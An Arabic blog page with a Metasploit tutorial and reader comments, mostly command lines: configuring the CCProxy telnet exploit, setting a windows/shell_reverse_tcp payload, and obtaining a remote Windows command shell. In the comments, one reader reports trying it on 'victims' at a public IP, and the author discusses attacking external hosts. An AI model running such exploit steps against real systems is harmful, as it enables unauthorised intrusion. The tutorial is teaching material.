القائمة البريدية

أضف ايميلك للاشتراك في القائمة

أحكام و أمثال أؤمن بها

لكي تضمن نجاحك تصرف وكأن الفشل من المستحيلات

مواضيع تستحق المشاهدة

• تنصيب واعداد BackTrack 3 Final
• شرح ثغرات Metasploit بالتفصيل
• عمل ARP Spoof باستخدام Dsniff
• معرفة وتغيير Mac Address الجهاز
• شرح تنصيب واعداد FreeBSD 7.0
• تنصيب نظام OpenBSD 4.4 بالفيديو
• معلومات عن Penetration Testing
• فحص الشبكات باستخدام Nmap
• شرح استخدامات أداة Netcat
• فيديو صناعة هوائي لكرت الوايرلس

المتواجدون الآن

عدد المتواجدون في المدونة: 17

لتصفح أفضل

التصنيفات

• BSD Systems
• Cryptography
• Designing
• GNU/Linux
• Hacking & Security
• iSecur1ty.org
• Networks
• Out The Box
• Programming
• Reverse Engineering
• Servers Management
• WEB Development
• Windows

أرشيف المدونة

Select Month February 2010  (1) January 2010  (2) December 2009  (1) November 2009  (1) October 2009  (1) August 2009  (1) July 2009  (1) June 2009  (1) May 2009  (3) April 2009  (2) March 2009  (3) February 2009  (2) January 2009  (8) December 2008  (2) November 2008  (3) October 2008  (3) September 2008  (3) August 2008  (4) July 2008  (5) June 2008  (7) May 2008  (3) April 2008  (7) March 2008  (7) February 2008  (14) January 2008  (27)

قائمة بالمواضيع المكتوبة في المدونة

البحث في المدونة

احصائيات متفرقة

تحتوي المدونة على 112 موضوع تتضمن 3472 تعليق و 2 تعليقات بانتظار الموافقة.. استمتع بوقتك!

الاعلانات

/pentest/exploits/framework3/

./msfconsole

msf > help

msf > show exploits
msf > info exploit
msf > use exploit

msf > show exploits

msf > info windows/proxy/ccproxy_telnet_ping

msf > use windows/proxy/ccproxy_telnet_ping

msf  exploit(ccproxy_telnet_ping) > show options

msf  exploit(ccproxy_telnet_ping) > set RHOST 192.168.0.53

msf  exploit(ccproxy_telnet_ping) > set RPORT 34

msf  exploit(ccproxy_telnet_ping) > show targets

msf  exploit(ccproxy_telnet_ping) > set TARGET 4

msf  exploit(ccproxy_telnet_ping) > show payloads

msf  exploit(ccproxy_telnet_ping) > set PAYLOAD windows/shell_reverse_tcp

msf  exploit(ccproxy_telnet_ping) > show options

msf  exploit(ccproxy_telnet_ping) > set LHOST 192.168.0.41

msf  exploit(ccproxy_telnet_ping) > exploit

msf > sessions -l

Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.0.41:23443 -> 192.168.0.53:1032

msf > sessions -i 1

[*] Starting interaction with 1...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32> 

./msfgui

./msfweb

http://127.0.0.1:55555

class Exploits::Windows:: Driver::Intel_Centrino_2200BG_driver_probe < Msf::Exploit::Remote

/home/USER/.msf3/

/root/.msf3

/home/USER/.msf3/modules/exploits

/home/USER/.msf3/modules/exploits/windows/driver/Intel_Centrino_2200BG_driver_probe.rb

svn update

1. 1- Napst3r كتب بتاريخ: 10 Aug 2008 الساعة: 3:21 PM
   

   سلامـ،
   حلوة منك اخي عبدوو….الف شكر
   اخوك النابستر المغربي
   موفق حبيبي ..

2. 2- Dr.$audi كتب بتاريخ: 10 Aug 2008 الساعة: 3:40 PM
   

   السلام عليكم

   الحمدلله على السلامه

   يعطيك العافيه يا عبد المهيمن

   شرح وافي للبرنامج واستغلال ثغراته

   ان شاء الله بدخل لليونكس بعد شوي واثبته ولو اني ما استخدمت البرنامج من فتره طويله

   ننظر جديدك

3. 3- Command.Line كتب بتاريخ: 10 Aug 2008 الساعة: 5:38 PM
   

   مشكووور جدا على الشرح الجميل

4. 4- Tokuo كتب بتاريخ: 10 Aug 2008 الساعة: 6:42 PM
   

   شكرًا لك أخي على هذا الشرح الوافي ,

5. 5- unary كتب بتاريخ: 10 Aug 2008 الساعة: 7:03 PM
   

   السلام عليكم
   موضوع جميل و منسق , طبعا أداة ال Metasploit من الادوات الاكتر انتشارا في استخداما في مجتمع ال Hackers او محبي ال Pentest و تتميز الاداة بما تتيحه للمستخدم من ال Payloads خلال تنفيد تغرة معينة بالاضافة الى امكانية تغيرها و مشروع ال Metasploit من المشاريع الناجحة و المميزة و تستحق التطوير .
   تحياتي لك أخي ، واصل .

6. 6- element hacker كتب بتاريخ: 10 Aug 2008 الساعة: 7:10 PM
   

   

   شرح وافي
   ربي يعيطك الف الف عاافية

   تحياااتي لك

7. 7- soufiane كتب بتاريخ: 10 Aug 2008 الساعة: 10:20 PM
   

   
   موضوع ممتاز جدا جدا
   شكرا يالغالي

   بس سؤال حبيبي الثغرات اللي في الميتا عبارة عن ريموت او لوكال

   طيب لو فيها ثغرات ريموت حط لنا اسمها

   و شكرا عالشرح

8. 8- Br4v3-H34r7 كتب بتاريخ: 10 Aug 2008 الساعة: 10:47 PM
   

   أهلا بالجميع, شكرا لتعليقاتكم و كلامكم.. نورت المدونة بوجودكم

   أخي soufiane لو قرأت الموضوع ستعرف جواب سؤلك

9. 9- مصطفى البازي كتب بتاريخ: 11 Aug 2008 الساعة: 11:08 AM
   

   ما شاء الله , شرح وافي وكافي , يعطيك العافية بل الذيب و واصل أبداعك

10. 10- IncLudEr كتب بتاريخ: 11 Aug 2008 الساعة: 2:45 PM
    

    بارك الله فيك حبيبي

    موضوع راائع و مفيد

    تعلمت منه الكثير

    اكثر ما اعجبني في الموضوع

    اخر عبارة هههههه

    يرجى عدم نقل الموضوع دون الاشارة برابط للمصدر!

    سلاآم

11. 11- w0rm92 كتب بتاريخ: 11 Aug 2008 الساعة: 3:55 PM
    

    موضوع جيد ويوضح للمتبدأين طريقه التعآمل معه وتقتدر بنفسك تضيف الثغرآت والأدوآت والصرآحة لل ع الويندوز جنيي وانا كل اجربه وانا ع البآك ترآك اثبت واحسن ..

    وتوجد اضافات قوية مثلا اضافه الي تقتل كل عمليآت الحمآية بعد اخترآق الجهآز ..

    يوجد شروحآت اجنبيه كثيرة للثغرآت هاذي ومآقصرت اخوي والله يوفقك فمآن اللهـ,

12. 12- Tokuo كتب بتاريخ: 11 Aug 2008 الساعة: 4:48 PM
    

    السلام عليكم ورحمة الله وبركاته

    أخي عبد المهيمن , احصل على نفس الخطأ في كل ثغرة وتظهر لي هذه الرسالة
    [*] Started reverse handler [-] Exploit failed: The requested address is not valid in its context. – bind(2)
    , رغم أنني قد تأكدت من جميع الأوامر , علماً بأنني أستخدمه على آي بي من الشبكة ,

    وشكراً

13. 13- maximus كتب بتاريخ: 11 Aug 2008 الساعة: 5:34 PM
    

    ماشاءالله عليك اخووووي مبدع ومدونة رائعة جداااا الى الامام حبيبي

14. 14- عجوز التماسيج كتب بتاريخ: 11 Aug 2008 الساعة: 5:46 PM
    

    بالفعل ابداع من شخص مبدع ماشاء الله ..

    اخوي عبدو انا حاولت ادخل مجال الـC ومدري هل هالمجال ينفعني مع لينكس والهكر

    او لا

    وشاكرلم مجهودك

15. 15- Br4v3-H34r7 كتب بتاريخ: 11 Aug 2008 الساعة: 9:00 PM
    

    مرة ثانية أهلا بالجميع و شكرا على تعليقاتكم و وجودكم بالمدونة, عذرا لن أتمكن من الرد على كل واحد شخصيا لأن ماشاء الله صار العدد كبير لذلك سأرد على الاستفسارات و بعض التعليقات فقط

    @IncLudEr: كتبت ذلك لأن مابقي موضوع في المدونة الا و تم نقله بعض الناقلين يذكر المصدر و البعض لو قدر يخفيه ماكان قصر لا تنسى الشعار على جميع الصور مع العلم أني لا أحبذ و لا أعلم أين الفائدة من نقل المواضيع و تكرار المحتوى!

    @Tokuo: أخي بهذه المعلومات البسيطة لن أستطيع مساعدتك و كما قلت في الموضوع لكل ثغرة خيارات تختلف عن الأخرى لذلك من المستحيل معرفة الخطأ بدون معلومات شاملة و لذلك يفضل أن تستخدم Google للبحث عن سبب الخطأ أو اعادة المحاولة و مراجعة الشرح فأنا لن أستطيع القيام بهذه المهمة للجميع, بالتوفيق…

    @عجوز التماسيج: موفق بلغة البرمجة C أخي.. و بالهاكر لايوجد شيء لا يفيدك ستسفيد من هذه اللغة في المراحل المتقدمة هي و لغة ASM و أيضا قد تحتاج لاحدى اللغات النصية ان صح القول مثل Ruby , Perl , Python بالتوفيق…

16. 16- Crazy Pc كتب بتاريخ: 11 Aug 2008 الساعة: 9:20 PM
    

    ماشاء الله
    شرح وافي منك اخي الكريم
    بس اتمنى البعض ما يطبقة في اخواننا
    واتمنى منك انك تواصل

    سامي

17. 17- KING SABRI كتب بتاريخ: 11 Aug 2008 الساعة: 11:12 PM
    

    بطل يا عبدو
    أنا عارف أنك ما تحب تنزل شرح كامل للأختراق علشان الأطفال لكن إن شاء زوارك عاقلين

    بوركت يا بطل و الله وفقك و عوزدا أحمدا

    تحياتي يا بطل

18. 18- Tokuo كتب بتاريخ: 12 Aug 2008 الساعة: 3:13 AM
    

    السلام عليكم

    أخي أنا اعرف أن لكل ثغرة خيارات تختلف عن الاخرى ولكني قد كتبت كل ثغرة بنفس الطريقة المطلوبة , إما أن تظهر هذه الرسالة
    [*] Started reverse handler
    [-] Exploit failed: The connection timed out

    أو هذه الرسالة

    [*] Started reverse handler
    [-] Exploit failed: The requested address is not valid in its context. – bind(2)

    وبالنسبة للثغرات هل هي قديمة ؟
    وموقع ميتاسبوليت لم يعد يضع ثغرات منذ 2005 , هل اصبح يدمجها بالبرنامج أم ماذا ؟
    وأنا آسف على الاسئلة الكثيرة

19. 19- Br4v3-H34r7 كتب بتاريخ: 12 Aug 2008 الساعة: 1:59 PM
    

    Crazy Pc و KING SABRI أهلا بكم نورت المدونة بوجودكم…

    أخي Tokuo و الله ما ظنيت أنك تستخدم نفس الثغرة! أجل هي قديمة و للاصدار 6.2 من برنامج CCProxy و الاصدار الحالي 6.6 على ما أذكر.. أنا استخدمت هذه الثغرة لأنها بسيطة و خياراتها قليلة و لتوضيح كيفية التعامل مع المشروع فقط! و ليس لتجريبها, أصلا برنامج CCProxy غير مشهور و طبعا اذا جربتها على الاصدار 6.2 من برنامج CCProxy باذن الله ستعمل معك.. الحمد لله ماشرحت الثغرة الجديدة الموجودة بسيرفر الـ DNS BIND كان نصف المواقع طارت بالتوفيق…

20. 20- skulk-fox كتب بتاريخ: 13 Aug 2008 الساعة: 2:28 AM
    

    شرح جميل جدا جزاك الله خير

    و ما عندي شي اقوله غير واصل ابداعك يا بطل

    اخوك باذن الله skulk-Fox

21. 21- الهاكرز كتب بتاريخ: 13 Aug 2008 الساعة: 7:36 PM
    

    إذا كنت تضن نفسك هاكرز و نحن أطفال صغار نحسب أنفسنا هاكر
    فإن
    لو أملك منك 2 فسوف أستعمر العالم بأكمله
    ستجد الإبي بتاعتي يدل على أنني جزائري
    و هو يتغير كل 30 دقيقة
    حاول دخول جهازي الابتوب إذا كنت خاكر
    

22. 22- Br4v3-H34r7 كتب بتاريخ: 13 Aug 2008 الساعة: 8:54 PM
    

    @skulk-fox: أنت أجمل أخي شكرا لتعليقك و أهلا بك في المدونة…

    @الهاكرز: على الرغم من أن الايميل و الموقع الذي أدخلته غير حقيقي الا أني نشرت تعليقك لأوضح بعض الأشياء.. أولا أنا لم أخص أحد بكلامي فببساطة الفعل هو الذي يدل على الشخص ان كان يستحق أن يقال عنه Hacker أما لا! و تعلم الهاكر و الاختراق من أجل المعرفة بالشيء و روح التحدي شيء و استخدامه لايذاء الآخرين و اختراق أجهزتهم شيء آخر, ثانيا لا أجد أي عبقرية اذا كان IP جهازك جزائري أو أي بلد آخر فحتى لو لم تكن تستخدم الانترنت من الجزائر.. يوجد اختراع اسمه بروكسي و آخر اسمه VPN و SSH Tunnels و 1000 طريقة غيرهم تمكن أي شخص من تغيير آيبي جهازه ببساطة و أيضا يجب أن تعرف أنا لا أخترق جهاز أحد و لست محتاج لذلك و أصلا لا أملك للقيام بهذه الأمور و اذا كنت تعتبر أن هذا هو الهاكر فاسمحلي أقلك أنت مخطئ تماما!

    ملاحظة: في المرة القادمة استعمل ايميل حقيقي و الا سأضطر آسفا لعدم السماح بنشر تعليقك!

23. 23- Alpha_HuNtEr كتب بتاريخ: 16 Aug 2008 الساعة: 1:35 PM
    

    السلام عليكم
    شرح جميل بالرغم أني ما قرأته جيدا لكنه أفضل من الشروحات الموجودة في الساحة العربية
    أظن أن مشروع ميتاسبلويت لديه مستقبل زاهر خصوصا Anti Fronsic
    هناك كتاب اعجبني جدا ويشرح هذا المشروع بشكل مفصل اسمه
    Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research
    لذلك للذي أراد تعلمها بشكل مفصل وكامل أنصحه بهذا الكتاب طبعا لايستغني عن المستندات الخاصة بالمشروع .
    تسلم أخي القلب الشجاع

24. 24- حلم اصبح حقيقه كتب بتاريخ: 16 Aug 2008 الساعة: 2:25 PM
    

    السلام عليكم ورحمة الله وبركاته

    الله يعطيك العافيه اخوي بس فيه حاجه لو تكرمت تشر حها لنا اضافة الثغرات في البرنامج

    لقيت مثلا ثغره في موقع سكيورتي ابي اضيفها للبرنامج وشلون

25. 25- Br4v3-H34r7 كتب بتاريخ: 16 Aug 2008 الساعة: 4:25 PM
    

    @Alpha_HuNtEr: و عليكم السلام أخي.. صحيح للميتاسبلويت مستقبل زاهر ليس بالـ Anti-Forensics فقط بل بمشاريع أخرى كثيرة, الكتاب الذي ذكرته موجود عندي و هو رائع و مفصل و يحتوي على شروحات متقدمة للميتاسبلويت و برمجة ثغراتها, أهلا بك و بالتوفيق…

    @حلم اصبح حقيقه: و عليكم السلام.. بصراحة مالي عارف شو بدي جاوبك.. أنت قرأت الشرح أم لا ؟ الطريقة مذكورة و مشروحة بالتفصيل!

26. 26- الفقير إلى الله .. كتب بتاريخ: 19 Aug 2008 الساعة: 5:06 PM
    

    السلآم عليكم ..

    آخي الكريم
    أشكرك على هذا الموضوع الجميل والشيق والنادر على مستوىآ المواقع العالميه
    واحب ان اقول
    بآرك الله فيك و زآد من علمك ..

    سؤالي : هل استعطيع تطبيق الشرح على نظام الوندوز اكس بي ؟
    أم أن هناك اختلاف في ذلك ؟

    واتمنى ان تضع لي أو لنا شرح مفصلاً لتطبيق الثغرات على النظام وندوز اكس بي .

    تحياتي
    

27. 27- Br4v3-H34r7 كتب بتاريخ: 19 Aug 2008 الساعة: 5:54 PM
    

    و عليكم السلام.. العفو أخي و ان شاء الله يكون الموضوع نال اعجابك, بالنسبة لسؤالك كما قلت في سابقا يمكن تطبيق بعض ماذكر هنا على نظام ويندوز لكن بهذه الحالة ستطبق ماذكر اما من الواجهة الرسومية أو من المتصفح و بصراحة لم أجرب ذلك و لا أضمن شيء هناك. بالتوفيق…

28. 28- ابوشافي كتب بتاريخ: 20 Aug 2008 الساعة: 8:34 AM
    

    اخ للأسف لا افهم في الهكر ان شاء الله اول نتعلم برمجه وبعدها يصير خير لاكن عندي سؤال : اذا عرفت للبرمجه هل اكون فهمت بعض الشيء في الهكر

29. 29- Br4v3-H34r7 كتب بتاريخ: 20 Aug 2008 الساعة: 12:16 PM
    

    أخي بعبارة بسيطة لا يمكن للشخص أن يكون هاكر اذا لم يكن مبرمج و يعرف عدة لغات أيضا!

30. 30- maximus كتب بتاريخ: 23 Aug 2008 الساعة: 2:11 AM
    

    ابدااااااااااااع ماشاء الله عليك وزادك علم ان شاء الله

31. 31- Sniper Hell كتب بتاريخ: 25 Aug 2008 الساعة: 1:43 PM
    

    السلام عليكم
    مشاء الله تبارك الرحمن
    (وقل ربي زدني علما)

    عندي سؤال والي هوا

    هل استطيع عن طريق هذه الآداة ان اخترق آيبي خارجي يعني موشرط يكون من شبكتي يعني من النت

    انا الي سمعت عنها انه يمكن ذلك

    حبيت اتاكد فقط

32. 32- Br4v3-H34r7 كتب بتاريخ: 25 Aug 2008 الساعة: 2:03 PM
    

    @maximus: أخي أنت الابداع و أهلا بك في المدونة…

    @Sniper Hell: و عليكم السلام .. أجل أخي طبعا يمكنك استخدام الميتاسبلويت على أيبي خارجي لكن بهذه الحالة التطبيق لن يكون على شبكتك الخاصة و قد تعترضك عدة مشاكل مثل وجود فايروول يمنع تنفيذ الثغرة أو قد تبقى تجرب الثغرة على سيرفر لمدة ساعة بعد ذلك تستنتج أنه Honypot اسألني أنا بالتوفيق…

33. 33- Sniper Hell كتب بتاريخ: 25 Aug 2008 الساعة: 2:51 PM
    

    اممم
    يعطيك العافية

    عندي سؤال

    ايش الفرق بين ال
    buffer
    و
    stack

    معليش اخوي رح اتعبك معاي

34. 34- Br4v3-H34r7 كتب بتاريخ: 25 Aug 2008 الساعة: 7:50 PM
    

    الله يعافيك أخي.. جواب سؤلك تجده برابط الويكي الخاص بالـ Buffer overflow الموجود في أول الموضوع و ستجد به كل المعلومات التي تحتاجها مثل الثغرة, أسبابها و أنواعها. بالتوفيق…

35. 35- iCoNzZz كتب بتاريخ: 26 Aug 2008 الساعة: 2:36 PM
    

    شُكراً لك على هذا الشرح الممتع المفيد
    بالتوفيق ان شاء الله

36. 36- sub-zero كتب بتاريخ: 27 Aug 2008 الساعة: 1:24 AM
    

    thanks brother
    

37. 37- egy_st3alth كتب بتاريخ: 28 Aug 2008 الساعة: 8:12 PM
    

    اخي العزيز بريف هرت شكرا جزيلا علي مجهودك الرائع ومدونتك الاكثر من رائعه ومواضيعك الغاية في الروعة كنت دورت كتير جدا علي كتاب Metasploit Toolkit for Penetration Testing, Exploit Development, and Vulnerability Research بس ملقتوش مجاني غير اني ملقتوش مذكور في اي موقع عربي غير مدونتك علي جوجل فياريت لو عندك الكتاب تنزله للافاده لاني غاية في الاحتياج لهذا الكتاب وشكرا

38. 38- Br4v3-H34r7 كتب بتاريخ: 29 Aug 2008 الساعة: 12:12 AM
    

    iCoNzZz & sub-zero: أهلا بكم في المدونة و ان شاء الله تكونوا استفدتوا من الموضوع…

    @egy_st3alth: و عليكم السلام أخي.. شكرا لكلامك و بالنسبة للكتاب تم ارسال رابطه لايميلك أتمنى لك التوفيق و أهلا بك في المدونة…

39. 39- قارئ ومثقف كتب بتاريخ: 29 Aug 2008 الساعة: 5:08 AM
    

    أريد ان أقول لك بأننى إكتشفت موقعك صدفة ، ورب صدفة خير من ألف موعد ، ووجدت شخصية جميلة مرتبة تشع ذكاء وعمل ، أحاول أن أقرأ كل سطر فى مدونتك حتى أستفيد من علمك ومن جهودك ، ولا يسعني إلا ان أشكرك وأتمنى لك التوفيق فى تطوير نفسك وبث العلم للناس . وشكرا لك.

40. 40- المحترف كتب بتاريخ: 30 Aug 2008 الساعة: 3:19 AM
    

    السلام عليكم ورحمة الله وبركاته

    الأخ العزيز Br4v3-H34r7 تشكراً جداً على مجهودك وإخلاصك في هذا المشروع الرائع بصراحة أنت من الناس النادرين والناجحين , أرجو منك التكرم ووضع أسماء كتب عربية أو مترجمة لكيفية إستغلال الثغرات سواءاً للأجهزة أم للمواقع …. لكي أستفيد لأني منذ زمن وأنا ابحث عن هذه الكتب المفيدة جداً لتطوير قدراتي في البرمجة …………….. وشكراً لك

41. 41- Br4v3-H34r7 كتب بتاريخ: 30 Aug 2008 الساعة: 10:53 AM
    

    @قارئ ومثقف: سعيد بوجودك هنا أخي.. أتمنى أن تكون استفدت من المواضيع و شكرا على الاطراء و أهلا بك في المدونة

    @المحترف: و عليكم السلام.. أنت أيضا شكرا للاطراء و أهلا بك في المدونة, بالنسبة للكتب شخصيا لم أجد شيء مترجم للعربي لذلك عليك الاعتماد على المصادر الأجنبية. , و أخيرا ممكن أفهم كيف مشروع ثغرات ميتاسبلويت سيطور قدراتك في البرمجة؟!

42. 42- FAHAD كتب بتاريخ: 31 Aug 2008 الساعة: 4:29 PM
    

    بارك الله فيك مقال اكثر من رائع اتشرف بوضع مدونتك في مفضلتي صراحه

    حبيت اسئلك بس كيف ابدأ ؟

    يعني اتمرس في لنكس (باك تراك3) او اني اتعلم لغة برمجه احسلي او استمر بأستخدام البيرفست اللي اعتبره مو هكر حقيقي ومابيطور من قدراتي

43. 43- Br4v3-H34r7 كتب بتاريخ: 01 Sep 2008 الساعة: 12:41 AM
    

    أهلا بك أخي فهد في المدونة.. بالنسبة لسؤلك جوابه بسيط اذا كنت متمكن من لينوكس و تعرف كيف تتعامل مع النظام بشكل جيد فالباك تراك مناسبة جدا و ان شاء الله بتفيدك كثير أما اذا كنت مبتدئ في لينوكس ابدأ باستخدامه و اختر توزيعة بسيطة مثل أبونتو.. و طبعا البرمجة بتفيدك كثير و استحالة الواحد يصير “هاكر” اذا ماكان مبرمج و بيعرف عدة لغات لكن بالمناسبة شو هذا “البيرفست” ؟؟!

44. 44- FAHAD كتب بتاريخ: 01 Sep 2008 الساعة: 2:09 PM
    

    البيرفست حبيبي برنامج اختراق ترسل السيرفر ويجيك التبليغ وتخترق بدون مايون عندك اي معرفه عن الهكر وهذا انا مااسميه هكر طبعا

45. 45- Br4v3-H34r7 كتب بتاريخ: 02 Sep 2008 الساعة: 4:58 PM
    

    أهلا يعني برنامج اختراق أجهزة في نظام ويندوز هذا الي ترسل تروجان ليفتح منفذ في جهاز الضحية و تشفره بالهيكس لعدم كشفه من الأنتي فايرس رجعتني للأيام التي كنت أستخدم بها برنامج prorat و subseven ههههههه طبعا هذا الكلام صرله أكثر من سنتين تحياتي.

46. 46- FAHAD كتب بتاريخ: 02 Sep 2008 الساعة: 5:39 PM
    

    ايوه هوا هذا

    اختراق المبتدئين

    بس مادامك انت مريت بهذي التجربه راح امرها زيك

    واصل لما وصلت به من علم

    وكل عام وانتم بخير

47. 47- Br4v3-H34r7 كتب بتاريخ: 02 Sep 2008 الساعة: 5:57 PM
    

    أخي أنا لم أقل لك أنها تجربة ناجحة و مفيدة! كانت مجرد ألعاب بدأنا بها و اذا أنت تعرف أنها كذلك تخطاها و لا داعي للمرور بها فهي ليست اختراق و أفضل ما تضيع وقتك بهذه الأمور ابدأ باستخدام لينوكس و تعلم البرمجة و بعد مدة سترى أن ما تتكلم عنه حاليا مجرد ألعاب لا أكثر بالتوفيق و رمضان مبارك ان شاء الله.

48. 48- ][LeONaL_HaCKeR][ كتب بتاريخ: 04 Sep 2008 الساعة: 4:38 PM
    

    ماشاء الله تبارك الله ….!!

    الله يعطيك الف عافية على الشرح وموفق ان شاء الله .!!
    اخووك

    ][LeONaL_HaCKeR][

49. 49- development كتب بتاريخ: 14 Sep 2008 الساعة: 3:30 PM
    

    السلام عليكم ورحمه الله وبركاته

    موضوع جميل بصراحه وطبقته حرفيا وتعلمت بعض الاساسيات مثل اختيار ثغره وكشف خياراتها

    لكن ابغى الكتاب اللي ارسلته للاخ الكريم بالايميل

    لاني حاب اتعلم البرنامج وماحصلته مجاني

    واذا عندك مواقع لتعليم البرنامج ارجوا وضع رابط له

    وزادك الله علما

50. 50- Br4v3-H34r7 كتب بتاريخ: 15 Sep 2008 الساعة: 12:04 AM
    

    LeONaL_HaCKeR & development: أهلا بكم في المدونة أخي development بصراحة صار أكثر من واحد طلب الكتاب عن طريق الايميل و أرسلت رابط التحميل لهم.. أما الأن فلقد أضفت رابط تحميل الكتاب لنهاية الموضوع.. أتمنى أن تستفيد منه.

51. 51- AbU-NaIf كتب بتاريخ: 19 Sep 2008 الساعة: 2:09 PM
    

    شررح رائع والصرااحه بسييط جدا مشرووع الميتسبليوت..

    عالعمووم كفيت ووفيت اخوووي..

    ويعطيك الف عافية..

52. 52- AbU-NaIf كتب بتاريخ: 23 Sep 2008 الساعة: 9:44 AM
    

    يعطييك العافية اخووي بس ياليت ترفع الكتاب على موقع غير الرابيد شير..

    لان محتاج الكتاب ضرووري لاهنت اخووي..

53. 53- Br4v3-H34r7 كتب بتاريخ: 23 Sep 2008 الساعة: 7:38 PM
    

    الله يعافيك أخي AbU-NaIf أتمنى أن تكون استفدت من الشرح.. بالنسبة للكتاب هو مرفوع على حسابي في موقع الربيدشير لضمان عدم حذفه لأنه يعتبر محتوى غير قانوني و لا يمكنني رفعه على سيرفر المدونة, بالتوفيق…

54. 54- Dial-up كتب بتاريخ: 23 Sep 2008 الساعة: 8:11 PM
    

    جزاك الله عنا خير الجزاء ونتقدر لك مجهودك وعندي طلب اذا امكن بالنسبه للكتاب ماقدرت احمله من الرابط اذا تقدر توفر رابط ثاني او ترسله على الايميل وشكرا

55. 55- Patriot Sa كتب بتاريخ: 20 Oct 2008 الساعة: 2:39 AM
    

    ماشااء الله هذا الموضوع اللي ابحث عنه من زمان
    من جد شرح ولا أروع اهنيك يابطل وبارك الله فيك

56. 56- MeiN KaMpF كتب بتاريخ: 21 Oct 2008 الساعة: 1:26 PM
    

    السلام عليكم
    حاولت اكثر من مره اطبق الشرح وطبقته اكثر من مره وعلى اكثر من ضحيه لكن في الاخير تظهر هذه الرساله
    >> exploit[*] Started reverse handler
    [-] Exploit failed: The connection timed out (94.97.4.240:23).
    هل هذا يعني ان الثغره لا تعمل مع الضحايا ؟

    سؤال اخر .. هل هناك موقع لتعليم هذا المشروع وشرح عملي لجميع ثغراته سواء باللغه العربيه ام الانجليزيه

    وشكرا لك

57. 57- تنصيب metasploit على على فيدورا كتب بتاريخ: 01 Nov 2008 الساعة: 6:57 AM
    

    [...] لمن يريد معلومات تفصيليّة حول كيفيّة استخدام برنامج metasplit الشهير لدى العاملين والدراسين في مجال أمن المعلومات والذي يجعل عملية الاختراق لحاسوب (يحتوي على ثغرة) عبارة عن نزهة أنصح بقراءة هذا المقال. [...]

58. 58- mohamed clay كتب بتاريخ: 24 Nov 2008 الساعة: 8:50 PM
    

    اخي شكرا لك على مجهوداتك الرائعة الا انه يتبادر لي السؤال التالي هل الواجهة الغير الرسومية اي الشاشة السوداء هل يمكن استعمالها في نظام windows xp لانه لم اتمكن من تحقيق دلك في المقابل تظهر لي فقط الواجهة الرسومية من خلال program files ارجو التوضيح وشكرااااااااااااااااااااااااااااا

59. 59- mohamed clay كتب بتاريخ: 24 Nov 2008 الساعة: 9:05 PM
    

    اخي اعدرني على ازاعجي ولكني ارا فيك الهكر الحقيقي واتخذك قدوة ولكن لا اعرف من اين ابدا حتى اصل الى مستواك فلقد بدات في تعلم visual basic اتمنى ان ترشدني الى الطريق الصحيح وشكرااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااااا

60. 60- Br4v3-H34r7 كتب بتاريخ: 25 Nov 2008 الساعة: 8:10 PM
    

    أهلا بالجميع.. أتمنى أن يكون الموضوع نال اعجابكم واستخدام موفق ان شاء الله.

    @MeiN KaMpF: عفوا أخي لتأخري.. لكن الآن حتى انتبهت لأسئلتك! بالنسبة للرسالة فهي تعني عدم تنفيذ الثغرة بنجاح.. لا أستطيع أن أقول لك أكثر من تأكد من الخيارات التي استخدمتها فكما قلت سابقا كل ثغرة تختلف عن الأخرى وهذه النوعية من الثغرات دقيق جدا! بالنسبة للمواقع لا يوجد شيء محدد, ابحث في Google وستجد كل شيء تحتاجه. بالتوفيق…

    @mohamed clay: العفو أخي.. أتمنى أن تكون استفدت من الشرح. بالنسبة لاستفسارك تستطيع استخدام سطر أوامر المشروع المدمج بداخل الواجهة الرسومية للبرنامج ان كانت هذه الواجهة هي التي تعمل من المتصفح أو الواجهة الرسومية العادية الا أني أنصحك باستخدام نظام Linux عوضا عن Windows في هذه الامور.. أما الطريق الصحيح للبداية في الهاكر فهو يحتاج لموضوع كامل قد أقوم بكتابته قريبا حتى ذلك الوقت اطلع على هذه الصفحة وبالنسبة للـ Visual Basic شخصيا أجدها خيار سيئ! من الأفضل أن تبدأ باستخدام لغة برمجة حديثة وسهلة.. يوجد العديد من الخيارات أمامك فاختيار اللغة يعتمد على نوعية البرامج التي تريد برمجتها! ونظام التشغيل الذي تريد أن تبرمج له. بالتوفيق

61. 61- mohamed clay كتب بتاريخ: 12 Dec 2008 الساعة: 12:08 AM
    

    شكرا لك اخي Br4v3-H34r7 على ارشادك وعلى مجهوداتك الاكثر من رائعة ويسعدنس ان اقول لك انني احضر الى الانتقال الى بيئة linux كما اريد ان اقول اني قرأت ان افضل لغة برمجة للبداية في عالم البرمجة هي visual basic ودلك لسهولتها كما انها تعتبر الطريق الاول لتفكير البرمجي على اي سوف اقرا عنها بعض الكتب وسانتقل مباشرة الى لغة c
    مجددا شكراااااااااااا على تعاونك وعلى مواضيعك الرائعة

62. 62- Br4v3-H34r7 كتب بتاريخ: 12 Dec 2008 الساعة: 12:40 AM
    

    العفو أخي وأتمنى لك رحلة مفيدة باستخدام نظام جنو/لينوكس بالنسبة للبرمجة فكما قلت لك شخصيا أجد لغة Visual Basic خيار سيء وهذه تجربة مررت بها قبلك أضف الى ذلك أن اللغة قديمة وليست عملية!.. صحيح البعض ينصح بها لسهولتها أو لأن هذا الشخص يعرف البرمجة بهذه اللغة فقط! بالنسبة لي أنصحك باختيار لغة برمجة سهلة وحديثة عوضا عن C مثل لغة JAVA , Ruby أو الانتقال لبيئة الـ .Net والبرمجة بلغة #C أو Visual Basic.NET.

63. 63- Tarek كتب بتاريخ: 31 Dec 2008 الساعة: 7:55 AM
    

    Exploit completed, but no session was created .

64. 64- migren كتب بتاريخ: 10 Jan 2009 الساعة: 7:58 PM
    

    رابط الكتاب للي يعانون من الرابيد شير

65. 65- lov3r كتب بتاريخ: 12 Jan 2009 الساعة: 1:05 AM
    

    جزاك الله خير .

    فعـلاُ طرح جميل ويتميز باول طرح على المواقع العربية .
    وكثرنا من الشروحات لان كل اتجاهي سيكروتي و هكر

    لاهنت … اخوك لوفر الصغير المبتدي

66. 66- Br4v3-H34r7 كتب بتاريخ: 12 Jan 2009 الساعة: 7:10 PM
    

    @Tarek: أخي الرسالة تعني وجود خطأ باعدادات الثغرة أو الاستغلال وقد يكون النظام الذي تحاول تنفيذ الثغرة عليه محدث أو انك اخترت استغلال لا يحتاج لعمل session بالمشروع!

